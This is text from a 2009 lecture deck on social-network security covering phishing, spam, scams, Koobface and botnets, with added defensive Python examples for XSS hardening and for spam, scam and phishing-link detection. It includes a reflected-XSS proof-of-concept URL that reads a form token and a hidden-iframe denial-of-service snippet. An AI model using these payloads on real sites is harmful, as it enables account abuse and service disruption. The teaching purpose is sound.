Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security...
![Page 1: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/1.jpg)
Social Networks and Security
Checkpoint Sep 7, 2009
Joseph Bonneau, Computer Laboratory
![Page 2: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/2.jpg)
Hack #1: Photo URL Forging
Photo Exploits: PHP parameter fiddling (Ng, 2008)
![Page 3: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/3.jpg)
Hack #1: Photo URL Forging
Photo Exploits: Content Delivery Network URL fiddling
![Page 4: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/4.jpg)
Overview
I. The Social Network Ecosystem
II. Security
III. Privacy
![Page 5: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/5.jpg)
A Brief History
• SixDegrees.com, 1997
• Friendster, 2002
• MySpace, 2003
• Facebook, 2004
• Twitter, 2006
• Definitive account: danah boyd and Nicole Ellison “Social Network Sites: Definition, History, and Scholarship,” 2007
![Page 6: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/6.jpg)
Exponential Growth
![Page 7: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/7.jpg)
Facebook is Everywhere...
Freetown Christiania (Copenhagen, Denmark)
![Page 8: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/8.jpg)
Demographics
Still fairly dominated by youth
![Page 9: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/9.jpg)
Demographics
Rapid growth in older demographics
![Page 10: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/10.jpg)
Global Growth
![Page 11: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/11.jpg)
Global Players (11/2008)
Credit: oxyweb.co.uk
![Page 12: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/12.jpg)
Global Players (4/2009)
Credit: Vincenzo Cosenza
![Page 13: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/13.jpg)
American Control
![Page 14: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/14.jpg)
Why Worry About Social Networks?
Just LAMP websites where you list your friends...
![Page 15: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/15.jpg)
The Surprising Depth of Facebook
Facebook Stream
![Page 16: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/16.jpg)
The Surprising Depth of Facebook
Facebook Applications
![Page 17: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/17.jpg)
The Surprising Depth of Facebook
Facebook Connect
![Page 18: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/18.jpg)
Web 2.0?
| Function | Internet version | Facebook version |
| --- | --- | --- |
| Page Markup | HTML, JavaScript | FBML |
| DB Queries | SQL | FBQL |
| Email | SMTP | FB Mail |
| Forums | Usenet, etc. | FB Groups |
| Instant Messages | XMPP | FB Chat |
| News Streams | RSS | FB Stream |
| Authentication | OpenID | FB Connect |
| Photo Sharing | Flickr, etc. | FB Photos |
| Video Sharing | YouTube, etc. | FB Video |
| Blogging | Blogger, etc. | FB Notes |
| Microblogging | Twitter, etc. | FB Status Updates |
| Micropayment | Peppercoin, etc. | FB Points |
| Event Planning | E-Vite | FB Events |
| Classified Ads | craigslist | FB Marketplace |
![Page 19: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/19.jpg)
From Al Gore to Mark Zuckerberg
Facebook has essentially re-invented the Internet
− Centralised
− Proprietary
− Walled
− Strong(er) identity
Killer addition is social context
![Page 20: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/20.jpg)
Parallel Trend: The Addition of Social Context
“Given sufficient funding, all web sites expand in functionality until users can add each other as friends”
![Page 21: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/21.jpg)
Facebook is the SNS that Matters
Dominant
− Largest and fastest-growing
− Most internationally successful
− Receives most media attention
Advanced
− Largest feature-set
− Most complex privacy model
− Closest representation of real-life social world
![Page 22: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/22.jpg)
Hack #2: Facebook XSS
http://www.facebook.com/connect/prompt_permissions.php?ext_perm=read_stream
Credit: theharmonyguy
![Page 23: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/23.jpg)
Hack #2: Facebook XSS
http://www.facebook.com/connect/prompt_permissions.php?ext_perm=1
Credit: theharmonyguy
![Page 24: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/24.jpg)
Hack #2: Facebook XSS
http://www.facebook.com/connect/prompt_permissions.php?ext_perm=%3Cscript%3Ealert(document.getElementById(%22post_form_id%22).value);%3C/script%3E
Credit: theharmonyguy
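The three URLs above show one parameter, `ext_perm`, being reflected into the permission prompt without validation or encoding, which is what lets the `%3Cscript%3E` variant run. The following is an added example, not code from the slides or from Facebook (whose endpoint was PHP): a Python rendering of the same prompt in its reflecting form and in a hardened form that applies two independent layers, an allowlist of permission names and HTML encoding of whatever is reflected. `read_stream` is on the slide; the other permission names in `KNOWN_PERMISSIONS` are constructed for the example.

```python
import html
from urllib.parse import urlsplit, unquote_plus

# Hypothetical allowlist of extended-permission names the prompt may show.
# "read_stream" appears on the slide; the other two names are constructed.
KNOWN_PERMISSIONS = {"read_stream", "publish_stream", "offline_access"}


def ext_perm_from_url(url: str) -> str:
    """Pull the raw ext_perm query value out of a prompt URL and percent-decode it."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == "ext_perm":
            return unquote_plus(value)
    return ""


def render_prompt_vulnerable(ext_perm: str) -> str:
    """Reflects the parameter into the page unmodified: the pattern behind the slide's alert()."""
    return f"<p>This application would like permission to: {ext_perm}</p>"


def render_prompt_hardened(ext_perm: str) -> str:
    """Layer 1: refuse anything that is not a known permission name.
    Layer 2: HTML-encode the value anyway, so a later change to the allowlist
    (or a bug in it) cannot turn the reflection back into script injection."""
    if ext_perm not in KNOWN_PERMISSIONS:
        return "<p>Unknown permission requested.</p>"
    return f"<p>This application would like permission to: {html.escape(ext_perm)}</p>"


def contains_script(rendered: str) -> bool:
    """Cheap check used in the demo: did a <script> tag survive into the output?"""
    return "<script>" in rendered.lower()


# The three URLs shown on the slides.
SLIDE_URLS = [
    "http://www.facebook.com/connect/prompt_permissions.php?ext_perm=read_stream",
    "http://www.facebook.com/connect/prompt_permissions.php?ext_perm=1",
    "http://www.facebook.com/connect/prompt_permissions.php?ext_perm="
    "%3Cscript%3Ealert(document.getElementById(%22post_form_id%22).value);%3C/script%3E",
]

if __name__ == "__main__":
    for url in SLIDE_URLS:
        value = ext_perm_from_url(url)
        print(repr(value))
        print("  vulnerable:", render_prompt_vulnerable(value))
        print("  hardened:  ", render_prompt_hardened(value))
```

The allowlist alone would have stopped the slide's payload, but encoding is kept as well: the prompt has no legitimate reason to emit user-controlled markup, so encoding costs nothing and covers the case where the allowlist is later widened to values that contain HTML metacharacters.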
![Page 25: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/25.jpg)
Overview
I. The Social Network Ecosystem
II. Security
III. Privacy
![Page 26: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/26.jpg)
SNS Threat Model
![Page 27: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/27.jpg)
SNS Threat Model
Account compromise
− Email or SNS (practically the same)
Computer compromise
Monetary Fraud
− Increasingly becoming a payment platform
Service denial/mischief
![Page 28: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/28.jpg)
Web 2.0?
Function Internet versionHTML, JavaScript FBML
DB Queries SQL FBQLEmail SMTP FB Mail
Forums Usenet, etc. FB GroupsInstant Messages XMPP FB Chat
News Streams RSS FB StreamAuthentication FB ConnectPhoto Sharing FB PhotosVideo Sharing FB Video
FB NotesTwitter, etc. FB Status Updates
FB PointsEvent Planning FB EventsClassified Ads FB Marketplace
Facebook versionPage Markup
OpenIDFlickr, etc.
YouTube, etc.Blogging Blogger, etc.
MicrobloggingMicropayment Peppercoin, etc.
E-Vitecraigslist
![Page 29: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/29.jpg)
The Downside of Re-inventing the Internet
SNSs repeating all of the web's security problems
− Phishing
− Spam
− 419 Scams & Fraud
− Identity Theft/Impersonation
− Malware
− Cross-site Scripting
− Click-Fraud
− Stalking, Harassment, Bullying, Blackmail
![Page 30: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/30.jpg)
Differences in the SNS world
Each has advantages and disadvantages
− Centralisation
− Social Connections
− Personal Information
![Page 31: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/31.jpg)
Phishing
Genuine Facebook emails
![Page 32: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/32.jpg)
Phishing
Phishing attempt, April 30, 2009
![Page 33: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/33.jpg)
Phishing
Phishing attempt, April 30, 2009
![Page 34: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/34.jpg)
Phishing
Major Phishing attempts, April 29-30, 2009
− Simple “look at this” messages
− Users directed to www.fbstarter.com, www.fbaction.net
− Phished credentials used to automatically log in, send more mail
− Some users report passwords changed
Most “elaborate” scheme seen yet
Phishtank reports Facebook 7th most common target
− Behind only banks, PayPal, eBay
![Page 35: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/35.jpg)
Why SNSs are Vulnerable to Phishing
“Social Phishing” is far more effective
− 72% successful in controlled study (Jagatic et al.)
No TLS for login page
No anti-phishing measures
Frequent genuine emails with login-links
Users don't consider SNS password as valuable
Web 2.0 sites encourage password sharing...
![Page 36: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/36.jpg)
Password Sharing
![Page 37: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/37.jpg)
SNS Phishing Defense
Many advantages over email phishing prevention
− Real-time monitoring
− Can block, revoke messages
− Block outgoing links
Fast response to recent attacks
− Emails blocked, removed, sites down within 24 hours
![Page 38: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/38.jpg)
Spam
Major factor in the decline of MySpace, Friendster
Attractive target
− Can message any user in the system
− “Social Spam” much more effective than random spam
− Account creation is very cheap
![Page 39: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/39.jpg)
Spam
![Page 40: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/40.jpg)
Spam
Many advantages for SNS
− Global monitoring, blocking
− Automatically detect spammer profiles
− Analyse link history
− Analyse graph structure
− Analyse profile
Aggressively request CAPTCHAs
Legal: Facebook won US $873 M award
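The slide lists three sources of evidence an operator can score automatically: link history, graph structure and the profile itself. The following is an added example, not from the slides or from any operator's system, of how those three signals combine into a spammer-profile score in Python. The graph signal is the local clustering coefficient (a real user's friends tend to know each other; a mass-added friend list does not), the link signal is how many messages carry URLs and to how many distinct hosts, and the profile signal is field completeness. The accounts, messages, profile fields and the threshold of three signals are all constructed for the example.

```python
import re
from itertools import combinations

URL_RE = re.compile(r"https?://([^/\s]+)", re.IGNORECASE)
PROFILE_FIELDS = ("photo", "hometown", "education", "birthday")   # constructed field set
FLAG_THRESHOLD = 3                                                # constructed: 3 of 4 signals


def build_graph(edges):
    """Undirected friendship graph as {node: set(friends)}."""
    friends = {}
    for a, b in edges:
        friends.setdefault(a, set()).add(b)
        friends.setdefault(b, set()).add(a)
    return friends


def local_clustering(friends, node):
    """Share of the node's friend pairs that are friends with each other."""
    nbrs = sorted(friends.get(node, ()))
    if len(nbrs) < 2:
        return 0.0
    linked = sum(1 for a, b in combinations(nbrs, 2) if b in friends[a])
    return linked / (len(nbrs) * (len(nbrs) - 1) / 2)


def link_history(messages):
    """Fraction of messages carrying a URL, and how many distinct hosts they point at."""
    with_url, hosts = 0, set()
    for text in messages:
        found = URL_RE.findall(text)
        if found:
            with_url += 1
            hosts.update(h.lower() for h in found)
    return (with_url / len(messages) if messages else 0.0), len(hosts)


def profile_completeness(profile):
    return sum(1 for f in PROFILE_FIELDS if profile.get(f)) / len(PROFILE_FIELDS)


def spam_signals(friends, messages, profile, node):
    """Return the human-readable signals that fired for this account."""
    fired = []
    if local_clustering(friends, node) < 0.1:
        fired.append("friends do not know each other")
    url_frac, n_hosts = link_history(messages)
    if url_frac > 0.8:
        fired.append("almost every message carries a link")
    if n_hosts == 1 and url_frac > 0.5:
        fired.append("every link points at the same host")
    if profile_completeness(profile) < 0.5:
        fired.append("near-empty profile")
    return fired


def is_spammer(friends, messages, profile, node):
    return len(spam_signals(friends, messages, profile, node)) >= FLAG_THRESHOLD


# Constructed sample data: a genuine user whose friends form a clique, and a
# "spambot" whose friends are unrelated and whose messages all push one site.
EDGES = [
    ("alice", "bob"), ("alice", "carol"), ("alice", "dave"),
    ("bob", "carol"), ("bob", "dave"), ("carol", "dave"),
    ("spambot", "alice"), ("spambot", "erin"), ("spambot", "frank"), ("spambot", "grace"),
]
FRIENDS = build_graph(EDGES)
MESSAGES = {
    "alice": [
        "see you at the pub tonight?",
        "happy birthday carol!",
        "photos from the weekend: http://photos.example.org/weekend",
    ],
    "spambot": [
        "hey check this out http://free-stuff.example.com/win",
        "look at this http://free-stuff.example.com/prize",
        "omg http://free-stuff.example.com/lol",
        "you won! claim here http://free-stuff.example.com/claim",
    ],
}
PROFILES = {
    "alice": {"photo": "alice.jpg", "hometown": "Cambridge", "education": "Univ.", "birthday": "1985-03-02"},
    "spambot": {"photo": "", "hometown": "", "education": "", "birthday": ""},
}

if __name__ == "__main__":
    for who in ("alice", "spambot"):
        print(who, is_spammer(FRIENDS, MESSAGES[who], PROFILES[who], who),
              spam_signals(FRIENDS, MESSAGES[who], PROFILES[who], who))
```

Requiring several independent signals matters because each one alone has obvious benign cases (a new user's friends may not know each other yet; a photographer legitimately posts links). Flagged accounts would feed the slide's CAPTCHA step rather than an automatic ban.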
![Page 41: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/41.jpg)
Spam
Tough question: Spam vs. Viral Promotion?
Facebook moving to two-classes of user:
− User profiles bound to represent “real people”
− Limits on friend count
− Limits on usernames
− Limits on messages
− “Pages” for celebrities, companies, bands, charities, etc.
− Most limits removed
− Subject to stricter control
![Page 42: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/42.jpg)
Malware
Koobface worm, launched August 2008
![Page 43: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/43.jpg)
Scams
Calvin: hey
Evan: holy moly. what's up man?
Calvin: i need your help urgently
Evan: yes sir
Calvin: am stuck here in london
Evan: stuck?
Calvin: yes i came here for a vacation
Calvin: on my process coming back home i was robbed inside the hotel i loged in
Evan: ok so what do you need
Calvin: can you loan me $900 to get a return ticket back home and pay my hotel bills
Evan: how do you want me to loan it to you?
Calvin: you can have the money send via western union
![Page 44: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/44.jpg)
Scams
Effective due to social context
− Skilled impersonators should be able to do much better
Not much can be done to prevent
− Education
Again, build detection system using social context, history
− Unexpected log-ins
− References to Western Union, etc.
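The slide's detection idea is to combine the account's own history (where it normally logs in from) with the content of what it sends (money-transfer services, stranded-abroad stories). The following is an added example, not from the slides or from any operator's system, scoring one chat session that way in Python. The outgoing messages are the lines "Calvin" sent in the chat on the previous slide; the login history, the country code "ZZ" for the suspect session, the term lists and the two-signal threshold are all constructed.

```python
# Constructed vocabularies; a deployment would learn these from labelled user reports.
MONEY_TRANSFER_TERMS = ("western union", "moneygram", "wire transfer", "send money", "loan me")
DISTRESS_TERMS = ("stuck", "robbed", "urgent", "hotel bill", "return ticket", "stranded")
FLAG_THRESHOLD = 2   # constructed: any two of the three signals


def usual_countries(login_history, user):
    """Countries this account has logged in from before: its own history as context."""
    return {country for who, country in login_history if who == user}


def assess_session(user, login_country, outgoing_messages, login_history):
    """Score one session against the account's history and the messages it sent."""
    reasons = []
    if login_country not in usual_countries(login_history, user):
        reasons.append(f"login from {login_country}, never seen for this account")
    text = " ".join(m.lower() for m in outgoing_messages)
    if any(term in text for term in MONEY_TRANSFER_TERMS):
        reasons.append("asks for money via a wire/transfer service")
    if any(term in text for term in DISTRESS_TERMS):
        reasons.append("stranded-abroad / urgent-help story")
    return {"user": user, "reasons": reasons, "flag": len(reasons) >= FLAG_THRESHOLD}


# Constructed history: "calvin" has only ever logged in from the US.
LOGIN_HISTORY = [("calvin", "US"), ("calvin", "US"), ("calvin", "US"), ("evan", "US")]

# Messages "Calvin" sent in the chat shown on the slide.
SCAM_MESSAGES = [
    "i need your help urgently",
    "am stuck here in london",
    "on my process coming back home i was robbed inside the hotel i loged in",
    "can you loan me $900 to get a return ticket back home and pay my hotel bills",
    "you can have the money send via western union",
]
# Constructed benign session for comparison.
BENIGN_MESSAGES = ["hey, still on for the game saturday?", "bring the tickets"]

if __name__ == "__main__":
    # "ZZ" is a placeholder country code for the constructed suspect session.
    print(assess_session("calvin", "ZZ", SCAM_MESSAGES, LOGIN_HISTORY))
    print(assess_session("calvin", "US", BENIGN_MESSAGES, LOGIN_HISTORY))
```

Because the content signals fire on their own, a session is still flagged when the attacker logs in from a familiar country, for instance through the victim's own machine; the login signal then only raises confidence. A flag would trigger a step-up check on the sender and a warning to the recipient, not a silent block, since a genuine stranded traveller would otherwise be cut off.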
![Page 45: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/45.jpg)
Malware
Koobface worm, launched August 2008
![Page 46: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/46.jpg)
Malware
Similar to Phishing
− Rapid spread via social context
− SNS can use social context to detect
− Also, warn users leaving site
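Two defences from this section share one mechanism: the phishing-defence slide's "block outgoing links" and this slide's "warn users leaving site". Both come down to classifying every link at click time. The following is an added example, not from the slides or from any operator's code, of such a classifier in Python. The two blocklisted hosts are the ones named on the phishing slide; the site domain, the name-lookalike heuristic and the four verdicts are constructed for the example.

```python
import re
from urllib.parse import urlsplit

SITE_DOMAINS = {"facebook.com"}                       # hypothetical: the operator's own domains
PHISHING_BLOCKLIST = {"fbstarter.com", "fbaction.net"}  # hosts named on the phishing slide
SAFE_SCHEMES = {"http", "https"}
URL_RE = re.compile(r"(?:https?://|www\.)[^\s<>\"']+", re.IGNORECASE)


def _within(host, domain):
    return host == domain or host.endswith("." + domain)


def classify_link(url, blocklist=PHISHING_BLOCKLIST, site_domains=SITE_DOMAINS):
    """Verdicts (constructed for this example):
    'internal'   - stays on the site, follow silently
    'blocked'    - known phishing host or non-http scheme, strip from the message
    'suspicious' - off-site host borrowing the site's name, strong interstitial warning
    'external'   - any other off-site link, plain 'you are leaving the site' interstitial"""
    parts = urlsplit(url.strip())
    if parts.scheme.lower() not in SAFE_SCHEMES:       # javascript:, data:, ...
        return "blocked"
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return "blocked"
    if any(_within(host, d) for d in site_domains):
        return "internal"
    if any(_within(host, d) for d in blocklist):
        return "blocked"
    labels = host.split(".")
    if "facebook" in host or any(label.startswith("fb") for label in labels[:-1]):
        return "suspicious"
    return "external"


def screen_message(text):
    """Classify every link in a message; blocked links are replaced before delivery."""
    decisions = []

    def replace(match):
        url = match.group(0)
        verdict = classify_link(url if "://" in url else "http://" + url)
        decisions.append((url, verdict))
        return "[link removed]" if verdict == "blocked" else url

    return URL_RE.sub(replace, text), decisions


if __name__ == "__main__":
    # Constructed message in the style of the April 2009 campaign described on the slides.
    print(screen_message("look at this www.fbstarter.com lol"))
    for u in ("http://www.facebook.com/home.php", "http://facebook-login.example.net/",
              "javascript:alert(1)", "http://www.bbc.co.uk/news"):
        print(u, "->", classify_link(u))
```

The lookalike heuristic is deliberately coarse (it would also mark a host such as `fbi.gov` as suspicious) and therefore only escalates the warning; it never blocks on its own. Because the operator sees every click, the same classifier doubles as a sensor: a burst of clicks on one new external host is the earliest signal that a campaign like the one on the previous slides has started.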
![Page 47: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/47.jpg)
Malware Defense
![Page 48: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/48.jpg)
Botnet Command & Control
Twitterbot, August 2009
![Page 49: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/49.jpg)
Botnet Command & Control
Social channels identified in 2009 as optimal for C & C channel
− Particularly Skype, MSN messenger, also Twitter, Facebook
− Seen in the wild August 2009
Can be monitored by service operator, but no incentive
![Page 50: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/50.jpg)
SNS-hosted botnet
Idea: add malicious JavaScript payload to a popular application
Example: Denial of Service:
```html
<iframe name="1" style="border: 0px none #ffffff; width: 0px; height: 0px;"
        src="http://victim-host/image1.jpg">
</iframe><br/>
```
